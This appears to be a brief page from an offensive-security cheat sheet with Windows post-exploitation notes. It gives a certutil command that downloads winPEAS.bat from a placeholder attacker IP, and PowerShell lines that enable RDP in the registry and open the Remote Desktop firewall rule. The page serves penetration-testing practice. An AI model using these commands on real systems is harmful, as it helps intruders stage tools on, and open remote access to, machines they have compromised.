Windows
CertUtil download file
certutil.exe -urlcache -split -f "http://<attacker-ip>:8081/winPEAS.bat" winpeas.batEnable RDP
Leverage powershell to enable rdp. Remember that by default, only one account can be logged.
#enable RDP
powershell Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
#allow rdp through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"Last updated
Was this helpful?